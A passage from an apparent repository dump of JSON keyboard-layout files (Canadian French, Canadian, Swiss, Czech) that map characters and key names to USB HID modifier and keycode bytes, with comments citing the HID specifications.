\"=\":\"00,00,2e\",\n \"[\":\"00,00,30\",\n \"]\":\"00,00,31\",\n \"~\":\"00,00,34\",\n \"'\":\"00,00,35\",\n \",\":\"00,00,36\",\n \".\":\"00,00,37\",\n \";\":\"00,00,38\",\n \"CAPSLOCK\":\"00,00,39\",\n \"F1\":\"00,00,3a\",\n \"F2\":\"00,00,3b\",\n \"F3\":\"00,00,3c\",\n \"F4\":\"00,00,3d\",\n \"F5\":\"00,00,3e\",\n \"F6\":\"00,00,3f\",\n \"F7\":\"00,00,40\",\n \"F8\":\"00,00,41\",\n \"F9\":\"00,00,42\",\n \"F10\":\"00,00,43\",\n \"F11\":\"00,00,44\",\n \"F12\":\"00,00,45\",\n \"PRINTSCREEN\":\"00,00,46\",\n \"SCROLLLOCK\":\"00,00,47\",\n \"BREAK\":\"00,00,48\",\n \"PAUSE\":\"00,00,48\",\n \"INSERT\":\"00,00,49\",\n \"HOME\":\"00,00,4a\",\n \"PAGEUP\":\"00,00,4b\",\n \"DEL\":\"00,00,4c\",\n \"DELETE\":\"00,00,4c\",\n \"END\":\"00,00,4d\",\n \"PAGEDOWN\":\"00,00,4e\",\n \"RIGHT\":\"00,00,4f\",\n \"RIGHTARROW\":\"00,00,4f\",\n \"LEFT\":\"00,00,50\",\n \"LEFTARROW\":\"00,00,50\",\n \"DOWN\":\"00,00,51\",\n \"DOWNARROW\":\"00,00,51\",\n \"UP\":\"00,00,52\",\n \"UPARROW\":\"00,00,52\",\n \"\\\\\":\"00,00,64\",\n \"APP\":\"00,00,65\",\n \"MENU\":\"00,00,65\",\n \"ALT-TAB\":\"00,00,71\",\n \"CONTROL\":\"01,00,00\",\n \"CTRL\":\"01,00,00\",\n \"SHIFT\":\"02,00,00\",\n \"A\":\"02,00,04\",\n \"B\":\"02,00,05\",\n \"C\":\"02,00,06\",\n \"D\":\"02,00,07\",\n \"E\":\"02,00,08\",\n \"F\":\"02,00,09\",\n \"G\":\"02,00,0a\",\n \"H\":\"02,00,0b\",\n \"I\":\"02,00,0c\",\n \"J\":\"02,00,0d\",\n \"K\":\"02,00,0e\",\n \"L\":\"02,00,0f\",\n \"M\":\"02,00,10\",\n \"N\":\"02,00,11\",\n \"O\":\"02,00,12\",\n \"P\":\"02,00,13\",\n \"Q\":\"02,00,14\",\n \"R\":\"02,00,15\",\n \"S\":\"02,00,16\",\n \"T\":\"02,00,17\",\n \"U\":\"02,00,18\",\n \"V\":\"02,00,19\",\n \"W\":\"02,00,1a\",\n \"X\":\"02,00,1b\",\n \"Y\":\"02,00,1c\",\n \"Z\":\"02,00,1d\",\n \"!\":\"02,00,1e\",\n \"@\":\"02,00,1f\",\n \"#\":\"02,00,20\",\n \"$\":\"02,00,21\",\n \"%\":\"02,00,22\",\n \"&\":\"02,00,24\",\n \"*\":\"02,00,25\",\n \"(\":\"02,00,26\",\n \")\":\"02,00,27\",\n \"_\":\"02,00,2d\",\n \"+\":\"02,00,2e\",\n \"`\":\"02,00,2f\",\n \"{\":\"02,00,30\",\n \"}\":\"02,00,31\",\n \"^\":\"02,00,34\",\n \"\\\"\":\"02,00,35\",\n \"<\":\"02,00,36\",\n \">\":\"02,00,37\",\n \":\":\"02,00,38\",\n \"|\":\"02,00,64\",\n \"CTRL-SHIFT\":\"03,00,00\",\n \"ALT\":\"04,00,00\",\n \"CTRL-ALT\":\"05,00,00\",\n \"ALT-SHIFT\":\"06,00,00\",\n \"COMMAND\":\"08,00,00\",\n \"GUI\":\"08,00,00\",\n \"WINDOWS\":\"08,00,00\",\n \"COMMAND-OPTION\":\"12,00,00\",\n \"/\":\"40,00,14\",\n \"?\":\"40,00,1a\",\n \"COMMAND-CTRL-SHIFT\":\"40,00,1a\",\n \"COMMAND-CTRL\":\"40,00,1a\",\n \"COMMAND-OPTION-SHIFT'\":\"40,00,1a\"\n}" }, { "path": "languages/ca-fr.json", "content": "{\r\n \"__comment\":\"All numbers here are in hex format and 0x is ignored.\",\r\n \"__comment\":\" \",\r\n \"__comment\":\"This list is in ascending order of 3rd byte (HID Usage ID).\",\r\n \"__comment\":\" See section 10 Keyboard/Keypad Page (0x07)\",\r\n \"__comment\":\" of document USB HID Usage Tables Version 1.12.\",\r\n \"__comment\":\" \",\r\n \"__comment\":\"Definition of these 3 bytes can be found\",\r\n \"__comment\":\" in section B.1 Protocol 1 (Keyboard)\",\r\n \"__comment\":\" of document Device Class Definition for HID Version 1.11\",\r\n \"__comment\":\" - byte 1: Modifier keys\",\r\n \"__comment\":\" - byte 2: Reserved\",\r\n \"__comment\":\" - byte 3: Keycode 1\",\r\n \"__comment\":\" \",\r\n \"__comment\":\"Both documents can be obtained from link here\",\r\n \"__comment\":\" http://www.usb.org/developers/hidpage/\",\r\n \"__comment\":\" \",\r\n \"__comment\":\"A = LeftShift + a, { = LeftShift + [\",\r\n \"__comment\":\" \",\r\n\t\"__comment\":\" Canadian french version made by Dominic Villeneuve\",\r\n \"a\":\"00,00,04\",\r\n \"b\":\"00,00,05\",\r\n \"c\":\"00,00,06\",\r\n \"d\":\"00,00,07\",\r\n \"e\":\"00,00,08\",\r\n \"f\":\"00,00,09\",\r\n \"g\":\"00,00,0a\",\r\n \"h\":\"00,00,0b\",\r\n \"i\":\"00,00,0c\",\r\n \"j\":\"00,00,0d\",\r\n \"k\":\"00,00,0e\",\r\n \"l\":\"00,00,0f\",\r\n \"m\":\"00,00,10\",\r\n \"n\":\"00,00,11\",\r\n \"o\":\"00,00,12\",\r\n \"p\":\"00,00,13\",\r\n \"q\":\"00,00,14\",\r\n \"r\":\"00,00,15\",\r\n \"s\":\"00,00,16\",\r\n \"t\":\"00,00,17\",\r\n \"u\":\"00,00,18\",\r\n \"v\":\"00,00,19\",\r\n \"w\":\"00,00,1a\",\r\n \"x\":\"00,00,1b\",\r\n \"y\":\"00,00,1c\",\r\n \"z\":\"00,00,1d\",\r\n \"1\":\"00,00,1e\",\r\n \"2\":\"00,00,1f\",\r\n \"3\":\"00,00,20\",\r\n \"4\":\"00,00,21\",\r\n \"5\":\"00,00,22\",\r\n \"6\":\"00,00,23\",\r\n \"7\":\"00,00,24\",\r\n \"8\":\"00,00,25\",\r\n \"9\":\"00,00,26\",\r\n \"0\":\"00,00,27\",\r\n \"ENTER\":\"00,00,28\",\r\n \"ESC\":\"00,00,29\",\r\n \"ESCAPE\":\"00,00,29\",\r\n \"TAB\":\"00,00,2b\",\r\n \" \":\"00,00,2c\",\r\n \"SPACE\":\"00,00,2c\",\r\n \"-\":\"00,00,2d\",\r\n \"=\":\"00,00,2e\",\r\n \"^\":\"00,00,2f\",\r\n \"<\":\"40,00,36\",\r\n \";\":\"00,00,33\",\r\n \"`\":\"40,00,2f\",\r\n \"#\":\"02,00,20\",\r\n \",\":\"00,00,36\",\r\n \".\":\"00,00,37\",\r\n \"CAPSLOCK\":\"00,00,39\",\r\n \"F1\":\"00,00,3a\",\r\n \"F2\":\"00,00,3b\",\r\n \"F3\":\"00,00,3c\",\r\n \"F4\":\"00,00,3d\",\r\n \"F5\":\"00,00,3e\",\r\n \"F6\":\"00,00,3f\",\r\n \"F7\":\"00,00,40\",\r\n \"F8\":\"00,00,41\",\r\n \"F9\":\"00,00,42\",\r\n \"F10\":\"00,00,43\",\r\n \"F11\":\"00,00,44\",\r\n \"F12\":\"00,00,45\",\r\n \"PRINTSCREEN\":\"00,00,46\",\r\n \"SCROLLLOCK\":\"00,00,47\",\r\n \"BREAK\":\"00,00,48\",\r\n \"PAUSE\":\"00,00,48\",\r\n \"INSERT\":\"00,00,49\",\r\n \"HOME\":\"00,00,4a\",\r\n \"PAGEUP\":\"00,00,4b\",\r\n \"DEL\":\"00,00,4c\",\r\n \"DELETE\":\"00,00,4c\",\r\n \"END\":\"00,00,4d\",\r\n \"PAGEDOWN\":\"00,00,4e\",\r\n \"RIGHT\":\"00,00,4f\",\r\n \"RIGHTARROW\":\"00,00,4f\",\r\n \"LEFT\":\"00,00,50\",\r\n \"LEFTARROW\":\"00,00,50\",\r\n \"DOWN\":\"00,00,51\",\r\n \"DOWNARROW\":\"00,00,51\",\r\n \"UP\":\"00,00,52\",\r\n \"UPARROW\":\"00,00,52\",\r\n \"APP\":\"00,00,65\",\r\n \"MENU\":\"00,00,65\",\r\n \"ALT-TAB\":\"00,00,71\",\r\n \"CONTROL\":\"01,00,00\",\r\n \"CTRL\":\"01,00,00\",\r\n \"SHIFT\":\"02,00,00\",\r\n \"A\":\"02,00,04\",\r\n \"B\":\"02,00,05\",\r\n \"C\":\"02,00,06\",\r\n \"D\":\"02,00,07\",\r\n \"E\":\"02,00,08\",\r\n \"F\":\"02,00,09\",\r\n \"G\":\"02,00,0a\",\r\n \"H\":\"02,00,0b\",\r\n \"I\":\"02,00,0c\",\r\n \"J\":\"02,00,0d\",\r\n \"K\":\"02,00,0e\",\r\n \"L\":\"02,00,0f\",\r\n \"M\":\"02,00,10\",\r\n \"N\":\"02,00,11\",\r\n \"O\":\"02,00,12\",\r\n \"P\":\"02,00,13\",\r\n \"Q\":\"02,00,14\",\r\n \"R\":\"02,00,15\",\r\n \"S\":\"02,00,16\",\r\n \"T\":\"02,00,17\",\r\n \"U\":\"02,00,18\",\r\n \"V\":\"02,00,19\",\r\n \"W\":\"02,00,1a\",\r\n \"X\":\"02,00,1b\",\r\n \"Y\":\"02,00,1c\",\r\n \"Z\":\"02,00,1d\",\r\n \"!\":\"02,00,1e\",\r\n \"\\\"\":\"02,00,35\",\r\n \"/\":\"00,00,35\",\r\n \"$\":\"02,00,21\",\r\n \"%\":\"02,00,22\",\r\n \"?\":\"02,00,23\",\r\n \"&\":\"02,00,24\",\r\n \"*\":\"02,00,25\",\r\n \"(\":\"02,00,26\",\r\n \")\":\"02,00,27\",\r\n \"_\":\"02,00,2d\",\r\n \"+\":\"02,00,2e\",\r\n \">\":\"40,00,37\",\r\n \":\":\"02,00,33\",\r\n \"|\":\"40,00,35\",\r\n \"'\":\"02,00,36\",\r\n \"CTRL-SHIFT\":\"03,00,00\",\r\n \"ALT\":\"04,00,00\",\r\n \"\\\\\":\"02,00,35\",\r\n \"CTRL-ALT\":\"05,00,00\",\r\n \"ALT-SHIFT\":\"06,00,00\",\r\n \"COMMAND\":\"08,00,00\",\r\n \"GUI\":\"08,00,00\",\r\n \"WINDOWS\":\"08,00,00\",\r\n \"COMMAND-OPTION\":\"12,00,00\",\r\n \"@\":\"02,00,1f\",\r\n \"[\":\"40,00,26\",\r\n \"]\":\"40,00,27\",\r\n \"}\":\"40,00,25\",\r\n \"~\":\"40,00,30\",\r\n \"{\":\"40,00,24\",\r\n \"COMMAND-CTRL-SHIFT\":\"40,00,34\",\r\n \"COMMAND-CTRL\":\"40,00,34\",\r\n \"COMMAND-OPTION-SHIFT'\":\"40,00,34\"\r\n}\r\n" }, { "path": "languages/ca.json", "content": "{\n \"__comment\":\"All numbers here are in hex format and 0x is ignored.\",\n \"__comment\":\" \",\n \"__comment\":\"This list is in ascending order of 3rd byte (HID Usage ID).\",\n \"__comment\":\" See section 10 Keyboard/Keypad Page (0x07)\",\n \"__comment\":\" of document USB HID Usage Tables Version 1.12.\",\n \"__comment\":\" \",\n \"__comment\":\"Definition of these 3 bytes can be found\",\n \"__comment\":\" in section B.1 Protocol 1 (Keyboard)\",\n \"__comment\":\" of document Device Class Definition for HID Version 1.11\",\n \"__comment\":\" - byte 1: Modifier keys\",\n \"__comment\":\" - byte 2: Reserved\",\n \"__comment\":\" - byte 3: Keycode 1\",\n \"__comment\":\" \",\n \"__comment\":\"Both documents can be obtained from link here\",\n \"__comment\":\" http://www.usb.org/developers/hidpage/\",\n \"__comment\":\" \",\n \"__comment\":\"A = LeftShift + a, { = LeftShift + [\",\n \"__comment\":\" \",\n \"a\":\"00,00,04\",\n \"b\":\"00,00,05\",\n \"c\":\"00,00,06\",\n \"d\":\"00,00,07\",\n \"e\":\"00,00,08\",\n \"f\":\"00,00,09\",\n \"g\":\"00,00,0a\",\n \"h\":\"00,00,0b\",\n \"i\":\"00,00,0c\",\n \"j\":\"00,00,0d\",\n \"k\":\"00,00,0e\",\n \"l\":\"00,00,0f\",\n \"m\":\"00,00,10\",\n \"n\":\"00,00,11\",\n \"o\":\"00,00,12\",\n \"p\":\"00,00,13\",\n \"q\":\"00,00,14\",\n \"r\":\"00,00,15\",\n \"s\":\"00,00,16\",\n \"t\":\"00,00,17\",\n \"u\":\"00,00,18\",\n \"v\":\"00,00,19\",\n \"w\":\"00,00,1a\",\n \"x\":\"00,00,1b\",\n \"y\":\"00,00,1c\",\n \"z\":\"00,00,1d\",\n \"1\":\"00,00,1e\",\n \"2\":\"00,00,1f\",\n \"3\":\"00,00,20\",\n \"4\":\"00,00,21\",\n \"5\":\"00,00,22\",\n \"6\":\"00,00,23\",\n \"7\":\"00,00,24\",\n \"8\":\"00,00,25\",\n \"9\":\"00,00,26\",\n \"0\":\"00,00,27\",\n \"ENTER\":\"00,00,28\",\n \"ESC\":\"00,00,29\",\n \"ESCAPE\":\"00,00,29\",\n \"TAB\":\"00,00,2b\",\n \" \":\"00,00,2c\",\n \"SPACE\":\"00,00,2c\",\n \"-\":\"00,00,2d\",\n \"=\":\"00,00,2e\",\n \"^\":\"00,00,2f\",\n \"<\":\"00,00,31\",\n \";\":\"00,00,33\",\n \"`\":\"00,00,34\",\n \"#\":\"00,00,35\",\n \",\":\"00,00,36\",\n \".\":\"00,00,37\",\n \"CAPSLOCK\":\"00,00,39\",\n \"F1\":\"00,00,3a\",\n \"F2\":\"00,00,3b\",\n \"F3\":\"00,00,3c\",\n \"F4\":\"00,00,3d\",\n \"F5\":\"00,00,3e\",\n \"F6\":\"00,00,3f\",\n \"F7\":\"00,00,40\",\n \"F8\":\"00,00,41\",\n \"F9\":\"00,00,42\",\n \"F10\":\"00,00,43\",\n \"F11\":\"00,00,44\",\n \"F12\":\"00,00,45\",\n \"PRINTSCREEN\":\"00,00,46\",\n \"SCROLLLOCK\":\"00,00,47\",\n \"BREAK\":\"00,00,48\",\n \"PAUSE\":\"00,00,48\",\n \"INSERT\":\"00,00,49\",\n \"HOME\":\"00,00,4a\",\n \"PAGEUP\":\"00,00,4b\",\n \"DEL\":\"00,00,4c\",\n \"DELETE\":\"00,00,4c\",\n \"END\":\"00,00,4d\",\n \"PAGEDOWN\":\"00,00,4e\",\n \"RIGHT\":\"00,00,4f\",\n \"RIGHTARROW\":\"00,00,4f\",\n \"LEFT\":\"00,00,50\",\n \"LEFTARROW\":\"00,00,50\",\n \"DOWN\":\"00,00,51\",\n \"DOWNARROW\":\"00,00,51\",\n \"UP\":\"00,00,52\",\n \"UPARROW\":\"00,00,52\",\n \"APP\":\"00,00,65\",\n \"MENU\":\"00,00,65\",\n \"ALT-TAB\":\"00,00,71\",\n \"CONTROL\":\"01,00,00\",\n \"CTRL\":\"01,00,00\",\n \"SHIFT\":\"02,00,00\",\n \"A\":\"02,00,04\",\n \"B\":\"02,00,05\",\n \"C\":\"02,00,06\",\n \"D\":\"02,00,07\",\n \"E\":\"02,00,08\",\n \"F\":\"02,00,09\",\n \"G\":\"02,00,0a\",\n \"H\":\"02,00,0b\",\n \"I\":\"02,00,0c\",\n \"J\":\"02,00,0d\",\n \"K\":\"02,00,0e\",\n \"L\":\"02,00,0f\",\n \"M\":\"02,00,10\",\n \"N\":\"02,00,11\",\n \"O\":\"02,00,12\",\n \"P\":\"02,00,13\",\n \"Q\":\"02,00,14\",\n \"R\":\"02,00,15\",\n \"S\":\"02,00,16\",\n \"T\":\"02,00,17\",\n \"U\":\"02,00,18\",\n \"V\":\"02,00,19\",\n \"W\":\"02,00,1a\",\n \"X\":\"02,00,1b\",\n \"Y\":\"02,00,1c\",\n \"Z\":\"02,00,1d\",\n \"!\":\"02,00,1e\",\n \"\\\"\":\"02,00,1f\",\n \"/\":\"02,00,20\",\n \"$\":\"02,00,21\",\n \"%\":\"02,00,22\",\n \"?\":\"02,00,23\",\n \"&\":\"02,00,24\",\n \"*\":\"02,00,25\",\n \"(\":\"02,00,26\",\n \")\":\"02,00,27\",\n \"_\":\"02,00,2d\",\n \"+\":\"02,00,2e\",\n \">\":\"02,00,31\",\n \":\":\"02,00,33\",\n \"|\":\"02,00,35\",\n \"'\":\"02,00,36\",\n \"CTRL-SHIFT\":\"03,00,00\",\n \"ALT\":\"04,00,00\",\n \"\\\\\":\"04,00,35\",\n \"CTRL-ALT\":\"05,00,00\",\n \"ALT-SHIFT\":\"06,00,00\",\n \"COMMAND\":\"08,00,00\",\n \"GUI\":\"08,00,00\",\n \"WINDOWS\":\"08,00,00\",\n \"COMMAND-OPTION\":\"12,00,00\",\n \"@\":\"40,00,1f\",\n \"[\":\"40,00,2f\",\n \"]\":\"40,00,30\",\n \"}\":\"40,00,31\",\n \"~\":\"40,00,33\",\n \"{\":\"40,00,34\",\n \"COMMAND-CTRL-SHIFT\":\"40,00,34\",\n \"COMMAND-CTRL\":\"40,00,34\",\n \"COMMAND-OPTION-SHIFT'\":\"40,00,34\"\n}" }, { "path": "languages/ch.json", "content": "{\n \"__comment\":\"All numbers here are in hex format and 0x is ignored.\",\n \"__comment\":\" \",\n \"__comment\":\"This list is in ascending order of 3rd byte (HID Usage ID).\",\n \"__comment\":\" See section 10 Keyboard/Keypad Page (0x07)\",\n \"__comment\":\" of document USB HID Usage Tables Version 1.12.\",\n \"__comment\":\" \",\n \"__comment\":\"Definition of these 3 bytes can be found\",\n \"__comment\":\" in section B.1 Protocol 1 (Keyboard)\",\n \"__comment\":\" of document Device Class Definition for HID Version 1.11\",\n \"__comment\":\" - byte 1: Modifier keys\",\n \"__comment\":\" - byte 2: Reserved\",\n \"__comment\":\" - byte 3: Keycode 1\",\n \"__comment\":\" \",\n \"__comment\":\"Both documents can be obtained from link here\",\n \"__comment\":\" http://www.usb.org/developers/hidpage/\",\n \"__comment\":\" \",\n \"__comment\":\"A = LeftShift + a, { = LeftShift + [\",\n \"__comment\":\" \",\n \"a\":\"00,00,04\",\n \"b\":\"00,00,05\",\n \"c\":\"00,00,06\",\n \"d\":\"00,00,07\",\n \"e\":\"00,00,08\",\n \"f\":\"00,00,09\",\n \"g\":\"00,00,0a\",\n \"h\":\"00,00,0b\",\n \"i\":\"00,00,0c\",\n \"j\":\"00,00,0d\",\n \"k\":\"00,00,0e\",\n \"l\":\"00,00,0f\",\n \"m\":\"00,00,10\",\n \"n\":\"00,00,11\",\n \"o\":\"00,00,12\",\n \"p\":\"00,00,13\",\n \"q\":\"00,00,14\",\n \"r\":\"00,00,15\",\n \"s\":\"00,00,16\",\n \"t\":\"00,00,17\",\n \"u\":\"00,00,18\",\n \"v\":\"00,00,19\",\n \"w\":\"00,00,1a\",\n \"x\":\"00,00,1b\",\n \"z\":\"00,00,1c\",\n \"y\":\"00,00,1d\",\n \"1\":\"00,00,1e\",\n \"2\":\"00,00,1f\",\n \"3\":\"00,00,20\",\n \"4\":\"00,00,21\",\n \"5\":\"00,00,22\",\n \"6\":\"00,00,23\",\n \"7\":\"00,00,24\",\n \"8\":\"00,00,25\",\n \"9\":\"00,00,26\",\n \"0\":\"00,00,27\",\n \"ENTER\":\"00,00,28\",\n \"ESC\":\"00,00,29\",\n \"ESCAPE\":\"00,00,29\",\n \"TAB\":\"00,00,2b\",\n \" \":\"00,00,2c\",\n \"SPACE\":\"00,00,2c\",\n \"'\":\"00,00,2d\",\n \"^\":\"00,00,2e\",\n \"$\":\"00,00,31\",\n \",\":\"00,00,36\",\n \".\":\"00,00,37\",\n \"-\":\"00,00,38\",\n \"CAPSLOCK\":\"00,00,39\",\n \"F1\":\"00,00,3a\",\n \"F2\":\"00,00,3b\",\n \"F3\":\"00,00,3c\",\n \"F4\":\"00,00,3d\",\n \"F5\":\"00,00,3e\",\n \"F6\":\"00,00,3f\",\n \"F7\":\"00,00,40\",\n \"F8\":\"00,00,41\",\n \"F9\":\"00,00,42\",\n \"F10\":\"00,00,43\",\n \"F11\":\"00,00,44\",\n \"F12\":\"00,00,45\",\n \"PRINTSCREEN\":\"00,00,46\",\n \"SCROLLLOCK\":\"00,00,47\",\n \"BREAK\":\"00,00,48\",\n \"PAUSE\":\"00,00,48\",\n \"INSERT\":\"00,00,49\",\n \"HOME\":\"00,00,4a\",\n \"PAGEUP\":\"00,00,4b\",\n \"DEL\":\"00,00,4c\",\n \"DELETE\":\"00,00,4c\",\n \"END\":\"00,00,4d\",\n \"PAGEDOWN\":\"00,00,4e\",\n \"RIGHT\":\"00,00,4f\",\n \"RIGHTARROW\":\"00,00,4f\",\n \"LEFT\":\"00,00,50\",\n \"LEFTARROW\":\"00,00,50\",\n \"DOWN\":\"00,00,51\",\n \"DOWNARROW\":\"00,00,51\",\n \"UP\":\"00,00,52\",\n \"UPARROW\":\"00,00,52\",\n \"<\":\"00,00,64\",\n \"APP\":\"00,00,65\",\n \"MENU\":\"00,00,65\",\n \"ALT-TAB\":\"00,00,71\",\n \"CONTROL\":\"01,00,00\",\n \"CTRL\":\"01,00,00\",\n \"SHIFT\":\"02,00,00\",\n \"A\":\"02,00,04\",\n \"B\":\"02,00,05\",\n \"C\":\"02,00,06\",\n \"D\":\"02,00,07\",\n \"E\":\"02,00,08\",\n \"F\":\"02,00,09\",\n \"G\":\"02,00,0a\",\n \"H\":\"02,00,0b\",\n \"I\":\"02,00,0c\",\n \"J\":\"02,00,0d\",\n \"K\":\"02,00,0e\",\n \"L\":\"02,00,0f\",\n \"M\":\"02,00,10\",\n \"N\":\"02,00,11\",\n \"O\":\"02,00,12\",\n \"P\":\"02,00,13\",\n \"Q\":\"02,00,14\",\n \"R\":\"02,00,15\",\n \"S\":\"02,00,16\",\n \"T\":\"02,00,17\",\n \"U\":\"02,00,18\",\n \"V\":\"02,00,19\",\n \"W\":\"02,00,1a\",\n \"X\":\"02,00,1b\",\n \"Z\":\"02,00,1c\",\n \"Y\":\"02,00,1d\",\n \"+\":\"02,00,1e\",\n \"\\\"\":\"02,00,1f\",\n \"*\":\"02,00,20\",\n \"%\":\"02,00,22\",\n \"&\":\"02,00,23\",\n \"/\":\"02,00,24\",\n \"(\":\"02,00,25\",\n \")\":\"02,00,26\",\n \"=\":\"02,00,27\",\n \"?\":\"02,00,2d\",\n \"`\":\"02,00,2e\",\n \"!\":\"02,00,30\",\n \";\":\"02,00,36\",\n \":\":\"02,00,37\",\n \"_\":\"02,00,38\",\n \">\":\"02,00,64\",\n \"CTRL-SHIFT\":\"03,00,00\",\n \"ALT\":\"04,00,00\",\n \"CTRL-ALT\":\"05,00,00\",\n \"ALT-SHIFT\":\"06,00,00\",\n \"COMMAND\":\"08,00,00\",\n \"GUI\":\"08,00,00\",\n \"WINDOWS\":\"08,00,00\",\n \"COMMAND-OPTION\":\"12,00,00\",\n \"@\":\"40,00,1f\",\n \"#\":\"40,00,20\",\n \"|\":\"40,00,24\",\n \"~\":\"40,00,2e\",\n \"[\":\"40,00,2f\",\n \"]\":\"40,00,30\",\n \"}\":\"40,00,31\",\n \"{\":\"40,00,35\",\n \"\\\\\":\"40,00,64\",\n \"COMMAND-CTRL-SHIFT\":\"40,00,64\",\n \"COMMAND-CTRL\":\"40,00,64\",\n \"COMMAND-OPTION-SHIFT'\":\"40,00,64\",\n \"__comment\":\"Everything below was additionally added by kuyaya\",\n \"GUI-l\":\"08,00,0f\",\n \"RIGHTSHIFT\":\"20,00,00\",\n \"A\":\"20,00,04\",\n \"B\":\"20,00,05\",\n \"C\":\"20,00,06\",\n \"D\":\"20,00,07\",\n \"E\":\"20,00,08\",\n \"F\":\"20,00,09\",\n \"G\":\"20,00,0a\",\n \"H\":\"20,00,0b\",\n \"I\":\"20,00,0c\",\n \"J\":\"20,00,0d\",\n \"K\":\"20,00,0e\",\n \"L\":\"20,00,0f\",\n \"M\":\"20,00,10\",\n \"N\":\"20,00,11\",\n \"O\":\"20,00,12\",\n \"P\":\"20,00,13\",\n \"Q\":\"20,00,14\",\n \"R\":\"20,00,15\",\n \"S\":\"20,00,16\",\n \"T\":\"20,00,17\",\n \"U\":\"20,00,18\",\n \"V\":\"20,00,19\",\n \"W\":\"20,00,1a\",\n \"X\":\"20,00,1b\",\n \"Z\":\"20,00,1c\",\n \"Y\":\"20,00,1d\",\n \"+\":\"20,00,1e\",\n \"\\\"\":\"20,00,1f\",\n \"*\":\"20,00,20\",\n \"%\":\"20,00,22\",\n \"&\":\"20,00,23\",\n \"/\":\"20,00,24\",\n \"(\":\"20,00,25\",\n \")\":\"20,00,26\",\n \"=\":\"20,00,27\",\n \"?\":\"20,00,2d\",\n \"`\":\"20,00,2e\",\n \"!\":\"20,00,30\",\n \";\":\"20,00,36\",\n \":\":\"20,00,37\",\n \"_\":\"20,00,38\",\n \">\":\"20,00,64\",\n \"°\":\"02,00,35\",\n \"°\":\"20,00,35\",\n \"§\":\"00,00,35\",\n \"ç\":\"02,00,21\",\n \"ç\":\"20,00,21\",\n \"¬\":\"40,00,23\",\n \"¦\":\"40,00,1e\",\n \"¢\":\"40,00,25\",\n \"´\":\"40,00,2d\",\n \"BACKSPACE\":\"00,00,2a\",\n \"SHIFT-BACKSPACE\":\"02,00,2a\", \n \"SHIFT-BACKSPACE\":\"20,00,2a\",\n \"€\":\"40,00,08\",\n \"è\":\"02,00,2f\",\n \"è\":\"20,00,2f\",\n \"ü\":\"00,00,2f\",\n \"¨\":\"00,00,30\",\n \"é\":\"02,00,33\",\n \"é\":\"20,00,33\",\n \"ö\":\"00,00,33\",\n \"ä\":\"00,00,34\",\n \"à\":\"02,00,34\",\n \"à\":\"20,00,34\",\n \"£\":\"02,00,32\",\n \"£\":\"20,00,32\",\n \"ALT-GR\":\"40,00,00\",\n \"RIGHTCONTROL\":\"10,00,00\",\n \"NUMLOCK\":\"00,00,53\",\n \"+\":\"00,00,57\",\n \"-\":\"00,00,56\",\n \"*\":\"00,00,55\",\n \"/\":\"00,00,54\",\n \"ENTER\":\"00,00,58\",\n \"DEL\":\"00,00,63\",\n \"INSERT\":\"00,00,62\",\n \"END\":\"00,00,59\",\n \"DOWN\":\"00,00,5a\",\n \"PAGEDOWN\":\"00,00,5b\",\n \"LEFT\":\"00,00,5c\",\n \"RIGHT\":\"00,00,5e\",\n \"HOME\":\"00,00,5f\",\n \"UP\":\"00,00,60\",\n \"PAGEUP\":\"00,00,61\",\n \".\":\"00,00,63\",\n \"0\":\"00,00,62\",\n \"1\":\"00,00,59\",\n \"2\":\"00,00,5a\",\n \"3\":\"00,00,5b\",\n \"4\":\"00,00,5c\",\n \"5\":\"00,00,5d\",\n \"6\":\"00,00,5e\",\n \"7\":\"00,00,5f\",\n \"8\":\"00,00,60\",\n \"9\":\"00,00,61\"\n}\n" }, { "path": "languages/cz.json", "content": "{\n \"__comment\":\"All numbers here are in hex format and 0x is ignored.\",\n \"__comment\":\" \",\n \"__comment\":\"This list is in ascending order of 3rd byte (HID Usage ID).\",\n \"__comment\":\" See section 10 Keyboard/Keypad Page (0x07)\",\n \"__comment\":\" of document USB HID Usage Tables Version 1.12.\",\n \"__comment\":\" \",\n \"__comment\":\"Definition of these 3 bytes can be found\",\n \"__comment\":\" in section B.1 Protocol 1 (Keyboard)\",\n \"__comment\":\" of document Device Class Definition for HID Version 1.11\",\n \"__comment\":\" - byte 1: Modifier keys\",\n \"__comment\":\" - byte 2: Reserved\",\n \"__comment\":\" - byte 3: Keycode 1\",\n \"__comment\":\" \",\n \"__comment\":\"Both documents can be obtained from link here\",\n \"__comment\":\" http://www.usb.org/developers/hidpage/\",\n \"__comment\":\" \",\n \"__comment\":\" Czech QWERTZ version made by Andrej Šimko\",\n \"__comment\":\" Note that some special characters use leftCtrl+leftAlt+[key]\",\n\t\"__comment\":\" Special Czech characters like ěščřžýáíéů are not included\",\n \"a\":\"00,00,04\",\n \"b\":\"00,00,05\",\n \"c\":\"00,00,06\",\n \"d\":\"00,00,07\",\n \"e\":\"00,00,08\",\n \"f\":\"00,00,09\",\n \"g\":\"00,00,0a\",\n \"h\":\"00,00,0b\",\n \"i\":\"00,00,0c\",\n \"j\":\"00,00,0d\",\n \"k\":\"00,00,0e\",\n \"l\":\"00,00,0f\",\n \"m\":\"00,00,10\",\n \"n\":\"00,00,11\",\n \"o\":\"00,00,12\",\n \"p\":\"00,00,13\",\n \"q\":\"00,00,14\",\n \"r\":\"00,00,15\",\n \"s\":\"00,00,16\",\n \"t\":\"00,00,17\",\n \"u\":\"00,00,18\",\n \"v\":\"00,00,19\",\n \"w\":\"00,00,1a\",\n \"x\":\"00,00,1b\",\n \"z\":\"00,00,1c\",\n \"y\":\"00,00,1d\",\n \"+\":\"00,00,1e\",\n \"ENTER\":\"00,00,28\",\n \"ESC\":\"00,00,29\",\n \"ESCAPE\":\"00,00,29\",\n \"TAB\":\"00,00,2b\",\n \" \":\"00,00,2c\",\n \"SPACE\":\"00,00,2c\",\n \"CTRL-ALT\":\"05,00,00\",\n \"=\":\"00,00,2d\",\n \")\":\"00,00,30\",\n \";\":\"00,00,35\",\n \",\":\"00,00,36\",\n \".\":\"00,00,37\",\n \"-\":\"00,00,38\",\n \"CAPSLOCK\":\"00,00,39\",\n \"F1\":\"00,00,3a\",\n \"F2\":\"00,00,3b\",\n \"F3\":\"00,00,3c\",\n \"F4\":\"00,00,3d\",\n \"F5\":\"00,00,3e\",\n \"F6\":\"00,00,3f\",\n \"F7\":\"00,00,40\",\n \"F8\":\"00,00,41\",\n \"F9\":\"00,00,42\",\n \"F10\":\"00,00,43\",\n \"F11\":\"00,00,44\",\n \"F12\":\"00,00,45\",\n \"PRINTSCREEN\":\"00,00,46\",\n \"SCROLLLOCK\":\"00,00,47\",\n \"BREAK\":\"00,00,48\",\n \"PAUSE\":\"00,00,48\",\n \"INSERT\":\"00,00,49\",\n 